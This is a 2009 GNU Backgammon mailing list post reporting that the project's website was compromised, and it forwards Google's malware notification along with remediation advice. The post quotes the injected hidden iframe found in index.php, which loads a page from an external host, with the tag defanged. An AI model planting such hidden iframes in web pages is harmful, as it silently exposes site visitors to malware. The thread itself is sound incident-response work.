Hi again,

I just did a quick check at the webpage. The file index.php contains the
line

<i_frame src="http://39t.ru:8080/index.php"; width=103 height=140
style="visibility: hidden"></i_frame>

Note: I had to change the tag to" i_frame" because the otherwise would not
be send. At first glance no other files or directories are hurt but Oytsein
and I probably need to take a deeper look.

Ciao

Achim


On Sat, Aug 15, 2009 at 5:13 AM, Mueller Achim <a...@gnubg.org> wrote:

>
>
> Anfang der weitergeleiteten E-Mail:
>
> *Von: *nore...@google.com
> *Datum: *15. August 2009 02:12:16 MESZ
> *An: *ab...@gnubg.org, ad...@gnubg.org, administra...@gnubg.org,
> cont...@gnubg.org, i...@gnubg.org, postmas...@gnubg.org,
> supp...@mail.bytecamp.net, webmas...@gnubg.org
> *Betreff: **Malware notification regarding gnubg.org*
>
> Dear site owner or webmaster of gnubg.org,
>
> We recently discovered that some of your pages can cause users to be
> infected with malicious software. We have begun showing a warning page to
> users who visit these pages by clicking a search result on Google.com.
>
> Below are some example URLs on your site which can cause users to be
> infected (space inserted to prevent accidental clicking in case your mail
> client auto-links URLs):
>
> http://gnubg .org/
> http://www.gnubg .org/
> http://www.gnubg .org/index.php?catid=10
>
> Here is a link to a sample warning page:
> http://www.google.com/interstitial?url=http%3A//gnubg.org/
>
> We strongly encourage you to investigate this immediately to protect your
> visitors. Although some sites intentionally distribute malicious software,
> in many cases the webmaster is unaware because:
>
> 1) the site was compromised
> 2) the site doesn't monitor for malicious user-contributed content
> 3) the site displays content from an ad network that has a malicious
> advertiser
>
> If your site was compromised, it's important to not only remove the
> malicious (and usually hidden) content from your pages, but to also identify
> and fix the vulnerability. We suggest contacting your hosting provider if
> you are unsure of how to proceed. StopBadware also has a resource page for
> securing compromised sites:
> http://www.stopbadware.org/home/security
>
> Once you've secured your site, you can request that the warning be removed
> by visiting
> http://www.google.com/support/webmasters/bin/answer.py?answer=45432
> and requesting a review. If your site is no longer harmful to users, we
> will remove the warning.
>
> Sincerely,
> Google Search Quality Team
>
>
>
> _______________________________________________
> Bug-gnubg mailing list
> Bug-gnubg@gnu.org
> http://lists.gnu.org/mailman/listinfo/bug-gnubg
>
>
_______________________________________________
Bug-gnubg mailing list
Bug-gnubg@gnu.org
http://lists.gnu.org/mailman/listinfo/bug-gnubg

Reply via email to